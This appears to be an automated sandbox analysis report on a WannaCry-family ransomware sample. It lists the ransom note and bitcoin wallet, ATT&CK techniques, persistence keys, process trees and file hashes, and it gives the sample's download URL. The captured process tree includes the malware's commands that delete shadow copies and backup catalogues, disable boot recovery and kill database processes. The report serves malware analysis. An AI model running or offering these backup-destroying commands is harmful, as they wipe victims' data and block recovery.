wannacry | hxxps://github[.]com/Da2dalus/The-MALWARE-Repo/raw/master/Ransomware/WannaCry[.]exe

Resubmissions

20-08-2024 09:24

240820-lc36xstgqb 10

14-06-2024 16:56

240614-vf2lyayfqd 10

Analysis

max time kernel
84s
max time network
63s
platform
windows11-21h2_x64
resource
win11-20240611-en
resource tags

arch:x64arch:x86image:win11-20240611-enlocale:en-usos:windows11-21h2-x64system
submitted
14-06-2024 16:56

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://github.com/Da2dalus/The-MALWARE-Repo/raw/master/Ransomware/WannaCry.exe

Score

10^/10

wannacry defense_evasion execution impact persistence ransomware spyware stealer worm

Malware Config

Extracted

Path

C:\Users\Admin\Downloads\!Please Read Me!.txt

Family

wannacry

Ransom Note

Q: What's wrong with my files? A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted. If you follow our instructions we guarantee that you can decrypt all your files quickly and safely! Let's start decrypting! Q: What do I do? A: First, you need to pay service fees for the decryption. Please send $300 worth of bitcoin to this bitcoin address: 15zGqZCTcys6eCjDkE3DypCjXi6QWRV6V1 Next, please find the decrypt software on your desktop, an executable file named "!WannaDecryptor!.exe". If it does not exsit, download the software from the address below. (You may need to disable your antivirus for a while.) rar password: wcry123 Run and follow the instructions! �

Wallets

15zGqZCTcys6eCjDkE3DypCjXi6QWRV6V1

Signatures

Wannacry
WannaCry is a ransomware cryptoworm.
ransomware worm wannacry
Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware defense_evasion impact execution

File Deletion
T1070.004

Inhibit System Recovery
T1490

Windows Management Instrumentation
T1047
Downloads MZ/PE file

Drops startup file 2 IoCs

Processes:

WannaCry.exe

description	ioc	process
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\~SDE4F6.tmp	WannaCry.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\~SDE4FD.tmp	WannaCry.exe

Executes dropped EXE 6 IoCs

Processes:

WannaCry.exe!WannaDecryptor!.exe!WannaDecryptor!.exe!WannaDecryptor!.exe!WannaDecryptor!.exe!WannaDecryptor!.exe

pid process

2004 WannaCry.exe
4868 !WannaDecryptor!.exe
4292 !WannaDecryptor!.exe
668 !WannaDecryptor!.exe
2968 !WannaDecryptor!.exe
3300 !WannaDecryptor!.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

pid	process
2004	WannaCry.exe
4868	!WannaDecryptor!.exe
4292	!WannaDecryptor!.exe
668	!WannaDecryptor!.exe
2968	!WannaDecryptor!.exe
3300	!WannaDecryptor!.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

WannaCry.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Microsoft Update Task Scheduler = "\"C:\\Users\\Admin\\Downloads\\WannaCry.exe\" /r"	WannaCry.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service
T1102

Processes:

flow ioc

1 raw.githubusercontent.com
12 raw.githubusercontent.com

flow	ioc
1	raw.githubusercontent.com
12	raw.githubusercontent.com

Sets desktop wallpaper using registry 2 TTPs 1 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

Processes:

!WannaDecryptor!.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-1276817940-128734381-631578427-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\!WannaCryptor!.bmp"	!WannaDecryptor!.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

msedge.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Kills process with taskkill 4 IoCs
evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid process

2064 taskkill.exe
3308 taskkill.exe
3964 taskkill.exe
4360 taskkill.exe

pid	process
2064	taskkill.exe
3308	taskkill.exe
3964	taskkill.exe
4360	taskkill.exe

NTFS ADS 2 IoCs

Processes:

msedge.exemsedge.exe

description	ioc	process
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 997774.crdownload:SmartScreen	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\WannaCry.exe:Zone.Identifier	msedge.exe

Suspicious behavior: EnumeratesProcesses 10 IoCs

Processes:

msedge.exemsedge.exemsedge.exeidentity_helper.exemsedge.exe

pid	process
4716	msedge.exe
4716	msedge.exe
3152	msedge.exe
3152	msedge.exe
2892	msedge.exe
2892	msedge.exe
4588	identity_helper.exe
4588	identity_helper.exe
5064	msedge.exe
5064	msedge.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs

Processes:

msedge.exe

pid process

3152 msedge.exe
3152 msedge.exe
3152 msedge.exe
3152 msedge.exe
3152 msedge.exe
3152 msedge.exe
3152 msedge.exe

Suspicious use of AdjustPrivilegeToken 49 IoCs

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exeWMIC.exevssvc.exe

description	pid	process
Token: SeDebugPrivilege	3308	taskkill.exe
Token: SeDebugPrivilege	4360	taskkill.exe
Token: SeDebugPrivilege	2064	taskkill.exe
Token: SeDebugPrivilege	3964	taskkill.exe
Token: SeIncreaseQuotaPrivilege	4936	WMIC.exe
Token: SeSecurityPrivilege	4936	WMIC.exe
Token: SeTakeOwnershipPrivilege	4936	WMIC.exe
Token: SeLoadDriverPrivilege	4936	WMIC.exe
Token: SeSystemProfilePrivilege	4936	WMIC.exe
Token: SeSystemtimePrivilege	4936	WMIC.exe
Token: SeProfSingleProcessPrivilege	4936	WMIC.exe
Token: SeIncBasePriorityPrivilege	4936	WMIC.exe
Token: SeCreatePagefilePrivilege	4936	WMIC.exe
Token: SeBackupPrivilege	4936	WMIC.exe
Token: SeRestorePrivilege	4936	WMIC.exe
Token: SeShutdownPrivilege	4936	WMIC.exe
Token: SeDebugPrivilege	4936	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4936	WMIC.exe
Token: SeRemoteShutdownPrivilege	4936	WMIC.exe
Token: SeUndockPrivilege	4936	WMIC.exe
Token: SeManageVolumePrivilege	4936	WMIC.exe
Token: 33	4936	WMIC.exe
Token: 34	4936	WMIC.exe
Token: 35	4936	WMIC.exe
Token: 36	4936	WMIC.exe
Token: SeIncreaseQuotaPrivilege	4936	WMIC.exe
Token: SeSecurityPrivilege	4936	WMIC.exe
Token: SeTakeOwnershipPrivilege	4936	WMIC.exe
Token: SeLoadDriverPrivilege	4936	WMIC.exe
Token: SeSystemProfilePrivilege	4936	WMIC.exe
Token: SeSystemtimePrivilege	4936	WMIC.exe
Token: SeProfSingleProcessPrivilege	4936	WMIC.exe
Token: SeIncBasePriorityPrivilege	4936	WMIC.exe
Token: SeCreatePagefilePrivilege	4936	WMIC.exe
Token: SeBackupPrivilege	4936	WMIC.exe
Token: SeRestorePrivilege	4936	WMIC.exe
Token: SeShutdownPrivilege	4936	WMIC.exe
Token: SeDebugPrivilege	4936	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4936	WMIC.exe
Token: SeRemoteShutdownPrivilege	4936	WMIC.exe
Token: SeUndockPrivilege	4936	WMIC.exe
Token: SeManageVolumePrivilege	4936	WMIC.exe
Token: 33	4936	WMIC.exe
Token: 34	4936	WMIC.exe
Token: 35	4936	WMIC.exe
Token: 36	4936	WMIC.exe
Token: SeBackupPrivilege	5112	vssvc.exe
Token: SeRestorePrivilege	5112	vssvc.exe
Token: SeAuditPrivilege	5112	vssvc.exe

Suspicious use of FindShellTrayWindow 36 IoCs

Processes:

msedge.exe

pid	process
3152	msedge.exe
3152	msedge.exe
3152	msedge.exe
3152	msedge.exe
3152	msedge.exe
3152	msedge.exe
3152	msedge.exe
3152	msedge.exe
3152	msedge.exe
3152	msedge.exe
3152	msedge.exe
3152	msedge.exe
3152	msedge.exe
3152	msedge.exe
3152	msedge.exe
3152	msedge.exe
3152	msedge.exe
3152	msedge.exe
3152	msedge.exe
3152	msedge.exe
3152	msedge.exe
3152	msedge.exe
3152	msedge.exe
3152	msedge.exe
3152	msedge.exe
3152	msedge.exe
3152	msedge.exe
3152	msedge.exe
3152	msedge.exe
3152	msedge.exe
3152	msedge.exe
3152	msedge.exe
3152	msedge.exe
3152	msedge.exe
3152	msedge.exe
3152	msedge.exe

Suspicious use of SendNotifyMessage 12 IoCs

Processes:

msedge.exe

pid	process
3152	msedge.exe
3152	msedge.exe
3152	msedge.exe
3152	msedge.exe
3152	msedge.exe
3152	msedge.exe
3152	msedge.exe
3152	msedge.exe
3152	msedge.exe
3152	msedge.exe
3152	msedge.exe
3152	msedge.exe

Suspicious use of SetWindowsHookEx 9 IoCs

Processes:

!WannaDecryptor!.exe!WannaDecryptor!.exe!WannaDecryptor!.exe!WannaDecryptor!.exe!WannaDecryptor!.exe

pid	process
4868	!WannaDecryptor!.exe
4868	!WannaDecryptor!.exe
4292	!WannaDecryptor!.exe
4292	!WannaDecryptor!.exe
668	!WannaDecryptor!.exe
668	!WannaDecryptor!.exe
2968	!WannaDecryptor!.exe
2968	!WannaDecryptor!.exe
3300	!WannaDecryptor!.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

msedge.exe

description	pid	process	target process
PID 3152 wrote to memory of 2756	3152	msedge.exe	msedge.exe
PID 3152 wrote to memory of 2756	3152	msedge.exe	msedge.exe
PID 3152 wrote to memory of 844	3152	msedge.exe	msedge.exe
PID 3152 wrote to memory of 844	3152	msedge.exe	msedge.exe
PID 3152 wrote to memory of 844	3152	msedge.exe	msedge.exe
PID 3152 wrote to memory of 844	3152	msedge.exe	msedge.exe
PID 3152 wrote to memory of 844	3152	msedge.exe	msedge.exe
PID 3152 wrote to memory of 844	3152	msedge.exe	msedge.exe
PID 3152 wrote to memory of 844	3152	msedge.exe	msedge.exe
PID 3152 wrote to memory of 844	3152	msedge.exe	msedge.exe
PID 3152 wrote to memory of 844	3152	msedge.exe	msedge.exe
PID 3152 wrote to memory of 844	3152	msedge.exe	msedge.exe
PID 3152 wrote to memory of 844	3152	msedge.exe	msedge.exe
PID 3152 wrote to memory of 844	3152	msedge.exe	msedge.exe
PID 3152 wrote to memory of 844	3152	msedge.exe	msedge.exe
PID 3152 wrote to memory of 844	3152	msedge.exe	msedge.exe
PID 3152 wrote to memory of 844	3152	msedge.exe	msedge.exe
PID 3152 wrote to memory of 844	3152	msedge.exe	msedge.exe
PID 3152 wrote to memory of 844	3152	msedge.exe	msedge.exe
PID 3152 wrote to memory of 844	3152	msedge.exe	msedge.exe
PID 3152 wrote to memory of 844	3152	msedge.exe	msedge.exe
PID 3152 wrote to memory of 844	3152	msedge.exe	msedge.exe
PID 3152 wrote to memory of 844	3152	msedge.exe	msedge.exe
PID 3152 wrote to memory of 844	3152	msedge.exe	msedge.exe
PID 3152 wrote to memory of 844	3152	msedge.exe	msedge.exe
PID 3152 wrote to memory of 844	3152	msedge.exe	msedge.exe
PID 3152 wrote to memory of 844	3152	msedge.exe	msedge.exe
PID 3152 wrote to memory of 844	3152	msedge.exe	msedge.exe
PID 3152 wrote to memory of 844	3152	msedge.exe	msedge.exe
PID 3152 wrote to memory of 844	3152	msedge.exe	msedge.exe
PID 3152 wrote to memory of 844	3152	msedge.exe	msedge.exe
PID 3152 wrote to memory of 844	3152	msedge.exe	msedge.exe
PID 3152 wrote to memory of 844	3152	msedge.exe	msedge.exe
PID 3152 wrote to memory of 844	3152	msedge.exe	msedge.exe
PID 3152 wrote to memory of 844	3152	msedge.exe	msedge.exe
PID 3152 wrote to memory of 844	3152	msedge.exe	msedge.exe
PID 3152 wrote to memory of 844	3152	msedge.exe	msedge.exe
PID 3152 wrote to memory of 844	3152	msedge.exe	msedge.exe
PID 3152 wrote to memory of 844	3152	msedge.exe	msedge.exe
PID 3152 wrote to memory of 844	3152	msedge.exe	msedge.exe
PID 3152 wrote to memory of 844	3152	msedge.exe	msedge.exe
PID 3152 wrote to memory of 844	3152	msedge.exe	msedge.exe
PID 3152 wrote to memory of 4716	3152	msedge.exe	msedge.exe
PID 3152 wrote to memory of 4716	3152	msedge.exe	msedge.exe
PID 3152 wrote to memory of 3984	3152	msedge.exe	msedge.exe
PID 3152 wrote to memory of 3984	3152	msedge.exe	msedge.exe
PID 3152 wrote to memory of 3984	3152	msedge.exe	msedge.exe
PID 3152 wrote to memory of 3984	3152	msedge.exe	msedge.exe
PID 3152 wrote to memory of 3984	3152	msedge.exe	msedge.exe
PID 3152 wrote to memory of 3984	3152	msedge.exe	msedge.exe
PID 3152 wrote to memory of 3984	3152	msedge.exe	msedge.exe
PID 3152 wrote to memory of 3984	3152	msedge.exe	msedge.exe
PID 3152 wrote to memory of 3984	3152	msedge.exe	msedge.exe
PID 3152 wrote to memory of 3984	3152	msedge.exe	msedge.exe
PID 3152 wrote to memory of 3984	3152	msedge.exe	msedge.exe
PID 3152 wrote to memory of 3984	3152	msedge.exe	msedge.exe
PID 3152 wrote to memory of 3984	3152	msedge.exe	msedge.exe
PID 3152 wrote to memory of 3984	3152	msedge.exe	msedge.exe
PID 3152 wrote to memory of 3984	3152	msedge.exe	msedge.exe
PID 3152 wrote to memory of 3984	3152	msedge.exe	msedge.exe
PID 3152 wrote to memory of 3984	3152	msedge.exe	msedge.exe
PID 3152 wrote to memory of 3984	3152	msedge.exe	msedge.exe
PID 3152 wrote to memory of 3984	3152	msedge.exe	msedge.exe
PID 3152 wrote to memory of 3984	3152	msedge.exe	msedge.exe

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://github.com/Da2dalus/The-MALWARE-Repo/raw/master/Ransomware/WannaCry.exe
1⤵
- Enumerates system info in registry
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3152

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffb30e23cb8,0x7ffb30e23cc8,0x7ffb30e23cd8
2⤵
PID:2756

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1896,13780631934676566262,16362411350253581959,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1912 /prefetch:2
2⤵
PID:844

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1896,13780631934676566262,16362411350253581959,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2364 /prefetch:3
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:4716

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1896,13780631934676566262,16362411350253581959,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2884 /prefetch:8
2⤵
PID:3984

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,13780631934676566262,16362411350253581959,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3304 /prefetch:1
2⤵
PID:3096

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,13780631934676566262,16362411350253581959,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3312 /prefetch:1
2⤵
PID:4112

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,13780631934676566262,16362411350253581959,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4928 /prefetch:1
2⤵
PID:3884

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1896,13780631934676566262,16362411350253581959,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5464 /prefetch:8
2⤵
PID:4748

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1896,13780631934676566262,16362411350253581959,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5388 /prefetch:8
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:2892

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,13780631934676566262,16362411350253581959,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5696 /prefetch:1
2⤵
PID:428

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,13780631934676566262,16362411350253581959,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5756 /prefetch:1
2⤵
PID:4868

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,13780631934676566262,16362411350253581959,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4924 /prefetch:1
2⤵
PID:1552

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,13780631934676566262,16362411350253581959,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6136 /prefetch:1
2⤵
PID:4672

C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1896,13780631934676566262,16362411350253581959,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6248 /prefetch:8
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:4588

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1896,13780631934676566262,16362411350253581959,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5632 /prefetch:8
2⤵
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
PID:5064

C:\Users\Admin\Downloads\WannaCry.exe
"C:\Users\Admin\Downloads\WannaCry.exe"
2⤵
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
PID:2004

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 72641718384235.bat
3⤵
PID:1800

C:\Windows\SysWOW64\cscript.exe
cscript //nologo c.vbs
4⤵
PID:4784

C:\Users\Admin\Downloads\!WannaDecryptor!.exe
!WannaDecryptor!.exe f
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4868

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im MSExchange*
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2064

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im Microsoft.Exchange.*
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3308

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im sqlserver.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3964

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im sqlwriter.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4360

C:\Users\Admin\Downloads\!WannaDecryptor!.exe
!WannaDecryptor!.exe c
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4292

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c start /b !WannaDecryptor!.exe v
3⤵
PID:428

C:\Users\Admin\Downloads\!WannaDecryptor!.exe
!WannaDecryptor!.exe v
4⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:668

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
5⤵
PID:820

C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic shadowcopy delete
6⤵
- Suspicious use of AdjustPrivilegeToken
PID:4936

C:\Users\Admin\Downloads\!WannaDecryptor!.exe
!WannaDecryptor!.exe
3⤵
- Executes dropped EXE
- Sets desktop wallpaper using registry
- Suspicious use of SetWindowsHookEx
PID:2968

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4736

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4728

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:5112

C:\Users\Admin\Downloads\!WannaDecryptor!.exe
"C:\Users\Admin\Downloads\!WannaDecryptor!.exe"
1⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:3300

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Windows Management Instrumentation

T1047

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Indicator Removal

T1070

File Deletion

T1070.004

Modify Registry

T1112

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Defacement

T1491

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
64f055a833e60505264595e7edbf62f6

SHA1
dad32ce325006c1d094b7c07550aca28a8dac890

SHA256
7172dc46924936b8dcee2d0c39535d098c2dbf510402c5bbb269399aed4d4c99

SHA512
86644776207d0904bc3293b4fec2fa724b8b3c9c3086cd0ef2696027ab3d840a8049b6bde3464c209e57ffa83cbc3df6115500fbe36a9acb222830c1aac4dc7a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
a74887034b3a720c50e557d5b1c790bf

SHA1
fb245478258648a65aa189b967590eef6fb167be

SHA256
f25b27187fad2b82ac76fae98dfdddc1c04f4e8370d112d45c1dd17a8908c250

SHA512
888c3fceb1a28a41c5449f5237ca27c7cbd057ce407f1542973478a31aa84ce9b77943130ca37551c31fa7cd737b9195b7374f886a969b39148a531530a91af3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
261B

MD5
2c2e6472d05e3832905f0ad4a04d21c3

SHA1
007edbf35759af62a5b847ab09055e7d9b86ffcc

SHA256
283d954fa21caa1f3b4aba941b154fab3e626ff27e7b8029f5357872c48cbe03

SHA512
8c4ce1ea02da6ffb7e7041c50528da447d087d9ee3c9f4a8c525d2d856cf48e46f5dd9a1fedd23dd047634e719c8886457f7e7240aa3cc36f1a6216e4c00ee37

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
cbfef2595dd3c3ae75b191337fe5b88b

SHA1
e33705ae85cd539d0bddf4d575312f23b810ae6e

SHA256
642c8afb8ffc7fbe51a8f179f3d81245fe4a0aa139f376d3d5e90f3b2aaa3623

SHA512
1bdb3a7019e34f00f5bb18d76c64ed72907cac2392a72374e3b7fdfab6c41b4db5a01cabb0abdc690952b29fd316cd35865bca44553b0f792f6291361e0dbc2a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
b8c3b406c51e8eb7da46fe5797af510c

SHA1
4281c613d14bae7b3e17a9d3917a3dd2449f996a

SHA256
e6054800896a859dc466370138eb599daab5d9b4eaaad735b81dd0f440ffdf92

SHA512
454501c0f594443961f7a4e83d43ac7daa5a52414e964c52c9ec1f849e5becaf8b8e8c3585b5df44e9e8028d0b039af5d8c0e59d748be575f2e476a2873b480c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
2f15a35f2b6e8369b24c74f5a86b7c53

SHA1
dd09fa364d1882a7a47a19c3c90df6bb5212e1e6

SHA256
31e8faa4c4b148177cf69108e39c559c9b3f459a70eb293af5bddc35790f6b39

SHA512
96fd474fffc956ba644978b7512e30d28f06c7a238021389301906d045a724073e65e01999639845562cf6dec3f49112288c6a87dcb653d091f97b36f59eb257

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
6752a1d65b201c13b62ea44016eb221f

SHA1
58ecf154d01a62233ed7fb494ace3c3d4ffce08b

SHA256
0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

SHA512
9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
658d7e5341d68a13190dfb9673e14c91

SHA1
cc7c42c19c0b156002215625d5afc4f626dffd1f

SHA256
c20935e0d5df3c22d4c159f03b5dcd89463937edc552592571a0b86cfd89bcbc

SHA512
0239c9e99bca7bb89c9a0084c1823068cc23c367ad7da3881bdeae32a25a79df67e48effcb9b904a0f4dda41dbcf67ce6eaa74937dd686f8d684c8c528d50013

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
ab9e4e0798245362040d6b780f496264

SHA1
8b3a766beddf5f36aa9cddec9559a5e83354157f

SHA256
c360a56a5a28b224b65a70c469dc83bba670010068108c0eb262468121ccce82

SHA512
